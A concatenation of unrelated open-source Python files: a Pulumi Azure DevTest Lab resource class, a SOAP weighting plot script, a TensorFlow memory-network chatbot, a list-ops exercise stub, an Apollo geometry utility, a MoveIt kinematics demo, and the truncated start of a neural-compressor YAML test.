def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _LabState:
def __init__(__self__, *,
artifacts_storage_account_id: Optional[pulumi.Input[str]] = None,
default_premium_storage_account_id: Optional[pulumi.Input[str]] = None,
default_storage_account_id: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
premium_data_disk_storage_account_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
unique_identifier: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Lab resources.
:param pulumi.Input[str] artifacts_storage_account_id: The ID of the Storage Account used for Artifact Storage.
:param pulumi.Input[str] default_premium_storage_account_id: The ID of the Default Premium Storage Account for this Dev Test Lab.
:param pulumi.Input[str] default_storage_account_id: The ID of the Default Storage Account for this Dev Test Lab.
:param pulumi.Input[str] key_vault_id: The ID of the Key used for this Dev Test Lab.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] premium_data_disk_storage_account_id: The ID of the Storage Account used for Storage of Premium Data Disk.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] unique_identifier: The unique immutable identifier of the Dev Test Lab.
"""
if artifacts_storage_account_id is not None:
pulumi.set(__self__, "artifacts_storage_account_id", artifacts_storage_account_id)
if default_premium_storage_account_id is not None:
pulumi.set(__self__, "default_premium_storage_account_id", default_premium_storage_account_id)
if default_storage_account_id is not None:
pulumi.set(__self__, "default_storage_account_id", default_storage_account_id)
if key_vault_id is not None:
pulumi.set(__self__, "key_vault_id", key_vault_id)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if premium_data_disk_storage_account_id is not None:
pulumi.set(__self__, "premium_data_disk_storage_account_id", premium_data_disk_storage_account_id)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if unique_identifier is not None:
pulumi.set(__self__, "unique_identifier", unique_identifier)
@property
@pulumi.getter(name="artifactsStorageAccountId")
def artifacts_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Storage Account used for Artifact Storage.
"""
return pulumi.get(self, "artifacts_storage_account_id")
@artifacts_storage_account_id.setter
def artifacts_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "artifacts_storage_account_id", value)
@property
@pulumi.getter(name="defaultPremiumStorageAccountId")
def default_premium_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Default Premium Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_premium_storage_account_id")
@default_premium_storage_account_id.setter
def default_premium_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_premium_storage_account_id", value)
@property
@pulumi.getter(name="defaultStorageAccountId")
def default_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Default Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_storage_account_id")
@default_storage_account_id.setter
def default_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_storage_account_id", value)
@property
@pulumi.getter(name="keyVaultId")
def key_vault_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Key used for this Dev Test Lab.
"""
return pulumi.get(self, "key_vault_id")
@key_vault_id.setter
def key_vault_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_vault_id", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="premiumDataDiskStorageAccountId")
def premium_data_disk_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Storage Account used for Storage of Premium Data Disk.
"""
return pulumi.get(self, "premium_data_disk_storage_account_id")
@premium_data_disk_storage_account_id.setter
def premium_data_disk_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "premium_data_disk_storage_account_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="uniqueIdentifier")
def unique_identifier(self) -> Optional[pulumi.Input[str]]:
"""
The unique immutable identifier of the Dev Test Lab.
"""
return pulumi.get(self, "unique_identifier")
@unique_identifier.setter
def unique_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unique_identifier", value)
class Lab(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Dev Test Lab.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_lab = azure.devtest.Lab("exampleLab",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"Sydney": "Australia",
})
```
## Import
Dev Test Labs can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:devtest/lab:Lab lab1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DevTestLab/labs/lab1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LabArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Dev Test Lab.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_lab = azure.devtest.Lab("exampleLab",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"Sydney": "Australia",
})
```
## Import
Dev Test Labs can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:devtest/lab:Lab lab1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DevTestLab/labs/lab1
```
:param str resource_name: The name of the resource.
:param LabArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LabArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LabArgs.__new__(LabArgs)
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["tags"] = tags
__props__.__dict__["artifacts_storage_account_id"] = None
__props__.__dict__["default_premium_storage_account_id"] = None
__props__.__dict__["default_storage_account_id"] = None
__props__.__dict__["key_vault_id"] = None
__props__.__dict__["premium_data_disk_storage_account_id"] = None
__props__.__dict__["unique_identifier"] = None
super(Lab, __self__).__init__(
'azure:devtest/lab:Lab',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
artifacts_storage_account_id: Optional[pulumi.Input[str]] = None,
default_premium_storage_account_id: Optional[pulumi.Input[str]] = None,
default_storage_account_id: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
premium_data_disk_storage_account_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
unique_identifier: Optional[pulumi.Input[str]] = None) -> 'Lab':
"""
Get an existing Lab resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] artifacts_storage_account_id: The ID of the Storage Account used for Artifact Storage.
:param pulumi.Input[str] default_premium_storage_account_id: The ID of the Default Premium Storage Account for this Dev Test Lab.
:param pulumi.Input[str] default_storage_account_id: The ID of the Default Storage Account for this Dev Test Lab.
:param pulumi.Input[str] key_vault_id: The ID of the Key used for this Dev Test Lab.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] premium_data_disk_storage_account_id: The ID of the Storage Account used for Storage of Premium Data Disk.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] unique_identifier: The unique immutable identifier of the Dev Test Lab.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _LabState.__new__(_LabState)
__props__.__dict__["artifacts_storage_account_id"] = artifacts_storage_account_id
__props__.__dict__["default_premium_storage_account_id"] = default_premium_storage_account_id
__props__.__dict__["default_storage_account_id"] = default_storage_account_id
__props__.__dict__["key_vault_id"] = key_vault_id
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["premium_data_disk_storage_account_id"] = premium_data_disk_storage_account_id
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["tags"] = tags
__props__.__dict__["unique_identifier"] = unique_identifier
return Lab(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="artifactsStorageAccountId")
def artifacts_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Storage Account used for Artifact Storage.
"""
return pulumi.get(self, "artifacts_storage_account_id")
@property
@pulumi.getter(name="defaultPremiumStorageAccountId")
def default_premium_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Default Premium Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_premium_storage_account_id")
@property
@pulumi.getter(name="defaultStorageAccountId")
def default_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Default Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_storage_account_id")
@property
@pulumi.getter(name="keyVaultId")
def key_vault_id(self) -> pulumi.Output[str]:
"""
The ID of the Key used for this Dev Test Lab.
"""
return pulumi.get(self, "key_vault_id")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="premiumDataDiskStorageAccountId")
def premium_data_disk_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Storage Account used for Storage of Premium Data Disk.
"""
return pulumi.get(self, "premium_data_disk_storage_account_id")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_type")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="uniqueIdentifier")
def unique_identifier(self) -> pulumi.Output[str]:
"""
The unique immutable identifier of the Dev Test Lab.
"""
return pulumi.get(self, "unique_identifier")
|
docs/src/assets/soap_weighting_plot.py
|
Iximiel/dscribe
| 265 |
101388
|
import numpy as np
import matplotlib.pyplot as plt
fig, (ax1, ax2, ax3) = plt.subplots(3, 1, sharex=True, figsize=(8,12))
# Plot pow with different settings
t = 1e-2
rcut = 5
settings = [
[2, rcut/(1/t*(1-t)) ** (1 / 2), 1],
[4, rcut/(1/t*(1-t)) ** (1 / 4), 1],
[8, rcut/(1/t*(1-t)) ** (1 / 8), 1],
]
rmin = 0
rmax = 5.2
for setting in settings:
m = setting[0]
r0 = setting[1]
c = setting[2]
d = c
r = np.arange(rmin, rmax, 0.01)
polym = c / (d + (r / r0) ** m)
ax2.plot(r, polym, label="m = {}, r0 = {:.3}, c = d = {}".format(m, r0, c))
ax2.axvline(rcut, color='k', linestyle='--')
ax2.text(
rcut*0.99,
0.5,
"rcut inferred from threshold",
verticalalignment='center',
horizontalalignment='right',
rotation="vertical",
)
ax2.set_title("pow")
ax2.set_xlabel("r")
ax2.set_ylabel("w(r)")
# Plot poly with different settings
settings = [
[rcut, 3],
[rcut, 2],
[rcut, 1],
]
for setting in settings:
r0 = setting[0]
m = setting[1]
c = 1
poly3m = []
for ri in r:
if ri < r0:
poly3m.append(c*(1 + 2 * (ri / r0) ** 3 - 3 * (ri / r0) ** 2) ** m)
else:
poly3m.append(0)
ax1.plot(r, poly3m, label="m = {}, r0 = {}, c={}".format(m, r0, c))
ax1.axvline(rcut, color='k', linestyle='--')
ax1.text(
rcut*0.99,
0.5,
"rcut inferred from r0".format(t),
verticalalignment='center',
horizontalalignment='right',
rotation="vertical",
)
ax1.set_title("poly")
ax1.set_xlabel("r")
ax1.set_ylabel("w(r)")
# Plot exp with different settings
settings = [
[rcut/np.log(1/t - 0), 1, 0],
[rcut/np.log(10/t - 9), 10, 9],
[rcut/np.log(100/t - 99), 100, 99],
]
for setting in settings:
r = np.arange(rmin, rmax, 0.01)
r0 = setting[0]
c = setting[1]
d = setting[2]
exp = c/(d + np.exp(r/r0))
ax3.plot(r, exp, label="r0={:.3}, c={}, d={}".format(r0, c, d))
ax3.axvline(rcut, color='k', linestyle='--')
ax3.text(
rcut*0.99,
0.5,
"rcut inferred from threshold",
verticalalignment='center',
horizontalalignment='right',
rotation="vertical",
)
ax3.set_title("exp")
ax3.set_xlabel("r")
ax3.set_ylabel("w(r)")
l = "upper right"
anchor = (0.9, 1)
ax1.set_xlim(rmin, rmax)
ax1.set_ylim(0, 1)
ax2.set_ylim(0, 1)
ax3.set_ylim(0, 1)
ax1.legend(loc=l, bbox_to_anchor=anchor)
ax2.legend(loc=l, bbox_to_anchor=anchor)
ax3.legend(loc=l, bbox_to_anchor=anchor)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.05)
plt.show()
|
Chapter09/chatbots_code/chatbot.py
|
vinay4711/Hands-On-Natural-Language-Processing-with-Python
| 110 |
101426
|
<reponame>vinay4711/Hands-On-Natural-Language-Processing-with-Python<gh_stars>100-1000
from sklearn import metrics
from itertools import chain
from six.moves import range, reduce
import numpy as np
import tensorflow as tf
from data_utils import tokenize, parse_dialogs_per_response
from memory_network import MemoryNetwork
def vectorize_candidates(candidates, word_idx, sentence_size):
# Determine shape of final vector
shape = (len(candidates), sentence_size)
candidates_vector = []
for i, candidate in enumerate(candidates):
# Determine zero padding
zero_padding = max(0, sentence_size - len(candidate))
# Append to final vector
candidates_vector.append(
[word_idx[w] if w in word_idx else 0 for w in candidate]
+ [0] * zero_padding)
# Return as TensorFlow constant
return tf.constant(candidates_vector, shape=shape)
def vectorize_data(data, word_idx, sentence_size, batch_size, max_memory_size):
facts_vector = []
questions_vector = []
answers_vector = []
# Sort data in descending order by number of facts
data.sort(key=lambda x: len(x[0]), reverse=True)
for i, (fact, question, answer) in enumerate(data):
# Find memory size
if i % batch_size == 0:
memory_size = max(1, min(max_memory_size, len(fact)))
# Build fact vector
fact_vector = []
for i, sentence in enumerate(fact, 1):
fact_padding = max(0, sentence_size - len(sentence))
fact_vector.append(
[word_idx[w] if w in word_idx else 0 for w in sentence]
+ [0] * fact_padding)
# Keep the most recent sentences that fit in memory
fact_vector = fact_vector[::-1][:memory_size][::-1]
# Pad to memory_size
memory_padding = max(0, memory_size - len(fact_vector))
for _ in range(memory_padding):
fact_vector.append([0] * sentence_size)
# Build question vector
question_padding = max(0, sentence_size - len(question))
question_vector = [word_idx[w] if w in word_idx else 0
for w in question] \
+ [0] * question_padding
# Append to final vectors
facts_vector.append(np.array(fact_vector))
questions_vector.append(np.array(question_vector))
# Answer is already an integer corresponding to a candidate
answers_vector.append(np.array(answer))
return facts_vector, questions_vector, answers_vector
class ChatBotWrapper(object):
def __init__(self, train_data, test_data, val_data,
candidates, candidates_to_idx,
memory_size, batch_size, learning_rate,
evaluation_interval, hops,
epochs, embedding_size):
self.memory_size = memory_size
self.batch_size = batch_size
self.evaluation_interval = evaluation_interval
self.epochs = epochs
self.candidates = candidates
self.candidates_to_idx = candidates_to_idx
self.candidates_size = len(candidates)
self.idx_to_candidates = dict((self.candidates_to_idx[key], key)
for key in self.candidates_to_idx)
# Initialize data and build vocabulary
self.train_data = train_data
self.test_data = test_data
self.val_data = val_data
self.build_vocab(train_data + test_data + val_data, candidates)
# Vectorize candidates
self.candidates_vec = vectorize_candidates(
candidates, self.word_idx, self.candidate_sentence_size)
# Initialize optimizer
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# Initialize TensorFlow session and Memory Network model
self.sess = tf.Session()
self.model = MemoryNetwork(
self.sentence_size, self.vocab_size,
self.candidates_size, self.candidates_vec,
embedding_size, hops,
optimizer=optimizer, session=self.sess)
def build_vocab(self, data, candidates):
# Build word vocabulary set from all data and candidate words
vocab = reduce(lambda x1, x2: x1 | x2,
(set(list(chain.from_iterable(facts)) + questions)
for facts, questions, answers in data))
vocab |= reduce(lambda x1, x2: x1 | x2,
(set(candidate) for candidate in candidates))
vocab = sorted(vocab)
# Assign integer indices to each word
self.word_idx = dict((word, idx + 1) for idx, word in enumerate(vocab))
# Compute various data size numbers
max_facts_size = max(map(len, (facts for facts, _, _ in data)))
self.sentence_size = max(
map(len, chain.from_iterable(facts for facts, _, _ in data)))
self.candidate_sentence_size = max(map(len, candidates))
question_size = max(map(len, (questions for _, questions, _ in data)))
self.memory_size = min(self.memory_size, max_facts_size)
self.vocab_size = len(self.word_idx) + 1 # +1 for null word
self.sentence_size = max(question_size, self.sentence_size)
def predict_for_batch(self, facts, questions):
preds = []
# Iterate over mini-batches
for start in range(0, len(facts), self.batch_size):
end = start + self.batch_size
facts_batch = facts[start:end]
questions_batch = questions[start:end]
# Predict per batch
pred = self.model.predict(facts_batch, questions_batch)
preds += list(pred)
return preds
def train(self):
# Vectorize training and validation data
train_facts, train_questions, train_answers = vectorize_data(
self.train_data, self.word_idx, self.sentence_size,
self.batch_size, self.memory_size)
val_facts, val_questions, val_answers = vectorize_data(
self.val_data, self.word_idx, self.sentence_size,
self.batch_size, self.memory_size)
# Chunk training data into batches
batches = zip(range(0, len(train_facts) - self.batch_size,
self.batch_size),
range(self.batch_size, len(train_facts),
self.batch_size))
batches = [(start, end) for start, end in batches]
# Start training loop
for epoch in range(1, self.epochs + 1):
np.random.shuffle(batches)
total_cost = 0.0
for start, end in batches:
facts = train_facts[start:end]
questions = train_questions[start:end]
answers = train_answers[start:end]
# Train on batch
batch_cost = self.model.fit(facts, questions, answers)
total_cost += batch_cost
if epoch % self.evaluation_interval == 0:
# Compute accuracy over training and validation set
train_preds = self.predict_for_batch(
train_facts, train_questions)
val_preds = self.predict_for_batch(
val_facts, val_questions)
train_acc = metrics.accuracy_score(
train_preds, train_answers)
val_acc = metrics.accuracy_score(
val_preds, val_answers)
print("Epoch: ", epoch)
print("Total Cost: ", total_cost)
print("Training Accuracy: ", train_acc)
print("Validation Accuracy: ", val_acc)
print("---")
def test(self):
# Compute accuracy over test set
test_facts, test_questions, test_answers = vectorize_data(
self.test_data, self.word_idx, self.sentence_size,
self.batch_size, self.memory_size)
test_preds = self.predict_for_batch(test_facts, test_questions)
test_acc = metrics.accuracy_score(test_preds, test_answers)
print("Testing Accuracy: ", test_acc)
def interactive_mode(self):
facts = []
utterance = None
response = None
turn_count = 1
while True:
line = input("==> ").strip().lower()
if line == "exit":
break
if line == "restart":
facts = []
turn_count = 1
print("Restarting dialog...\n")
continue
utterance = tokenize(line)
data = [(facts, utterance, -1)]
# Vectorize data and make prediction
f, q, a = vectorize_data(data, self.word_idx,
self.sentence_size, self.batch_size, self.memory_size)
preds = self.model.predict(f, q)
response = self.idx_to_candidates[preds[0]]
# Print predicted response
print(response)
response = tokenize(response)
# Add turn count temporal encoding
utterance.append("$u")
response.append("$r")
# Add utterance/response encoding
utterance.append("#" + str(turn_count))
response.append("#" + str(turn_count))
# Update facts memory
facts.append(utterance)
facts.append(response)
turn_count += 1
if __name__ == "__main__":
candidates = []
candidates_to_idx = {}
with open('dialog-babi/dialog-babi-candidates.txt') as f:
for i, line in enumerate(f):
candidates_to_idx[line.strip().split(' ', 1)[1]] = i
line = tokenize(line.strip())[1:]
candidates.append(line)
train_data = []
with open('dialog-babi/dialog-babi-task5-full-dialogs-trn.txt') as f:
train_data = parse_dialogs_per_response(f.readlines(), candidates_to_idx)
test_data = []
with open('dialog-babi/dialog-babi-task5-full-dialogs-tst.txt') as f:
test_data = parse_dialogs_per_response(f.readlines(), candidates_to_idx)
val_data = []
with open('dialog-babi/dialog-babi-task5-full-dialogs-dev.txt') as f:
val_data = parse_dialogs_per_response(f.readlines(), candidates_to_idx)
chatbot = ChatBotWrapper(train_data, test_data, val_data,
candidates, candidates_to_idx,
memory_size=50,
batch_size=32,
learning_rate=0.001,
evaluation_interval=10,
hops=3,
epochs=200,
embedding_size=50)
chatbot.train()
chatbot.test()
chatbot.interactive_mode()
|
exercises/list-ops/list_ops.py
|
kishankj/python
| 1,177 |
101430
|
<gh_stars>1000+
def append(list1, list2):
pass
def concat(lists):
pass
def filter(function, list):
pass
def length(list):
pass
def map(function, list):
pass
def foldl(function, list, initial):
pass
def foldr(function, list, initial):
pass
def reverse(list):
pass
|
modules/tools/prediction/data_pipelines/common/util.py
|
jzjonah/apollo
| 22,688 |
101439
|
<reponame>jzjonah/apollo<filename>modules/tools/prediction/data_pipelines/common/util.py
#!/usr/bin/env python3
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
def segment_overlap(a, b, x, y):
if b < x or a > y:
return False
return True
def vector_projection_overlap(p0, p1, p2, p3):
v = p1.subtract(p0)
n_square = v.norm_square()
v0 = p2.subtract(p0)
v1 = p3.subtract(p0)
t0 = v0.dot(v)
t1 = v1.dot(v)
if t0 > t1:
t = t0
t0 = t1
t1 = t
return segment_overlap(t0, t1, 0.0, n_square)
|
planning&perception/moveit_skill/probot_demo/scripts/moveit_fk_demo.py
|
Hinson-A/guyueclass
| 227 |
101448
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2019 Wuhan PS-Micro Technology Co., Itd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy, sys
import moveit_commander
class MoveItFkDemo:
def __init__(self):
# 初始化move_group的API
moveit_commander.roscpp_initialize(sys.argv)
# 初始化ROS节点
rospy.init_node('moveit_fk_demo', anonymous=True)
# 初始化需要使用move group控制的机械臂中的arm group
arm = moveit_commander.MoveGroupCommander('manipulator')
# 设置机械臂运动的允许误差值
arm.set_goal_joint_tolerance(0.001)
# 设置允许的最大速度和加速度
arm.set_max_acceleration_scaling_factor(0.5)
arm.set_max_velocity_scaling_factor(0.5)
# 控制机械臂先回到初始化位置
arm.set_named_target('home')
arm.go()
rospy.sleep(1)
# 设置机械臂的目标位置,使用六轴的位置数据进行描述(单位:弧度)
joint_positions = [0.391410, -0.676384, -0.376217, 0.0, 1.052834, 0.454125]
arm.set_joint_value_target(joint_positions)
# 控制机械臂完成运动
arm.go()
rospy.sleep(1)
# 控制机械臂先回到初始化位置
arm.set_named_target('home')
arm.go()
rospy.sleep(1)
# 关闭并退出moveit
moveit_commander.roscpp_shutdown()
moveit_commander.os._exit(0)
if __name__ == "__main__":
try:
MoveItFkDemo()
except rospy.ROSInterruptException:
pass
|
test/test_tensorflow_recipe.py
|
huggingface/neural-compressor
| 172 |
101456
|
<reponame>huggingface/neural-compressor
#
# -*- coding: utf-8 -*-
#
import unittest
import os
import yaml
import tensorflow as tf
from tensorflow.python.framework import graph_util
from neural_compressor.adaptor.tf_utils.util import disable_random
def build_fake_yaml_disable_first_quantization():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
quantization:
recipes:
first_conv_or_matmul_quantization: False
model_wise:
weight:
granularity: per_tensor
scheme: sym
dtype: int8
algorithm: minmax
evaluation:
accuracy:
metric:
topk: 1
tuning:
strategy:
name: basic
accuracy_criterion:
relative: 0.1
exit_policy:
performance_only: True
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_disable_first_quantization.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
f.close()
def build_fake_yaml_enable_first_quantization():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
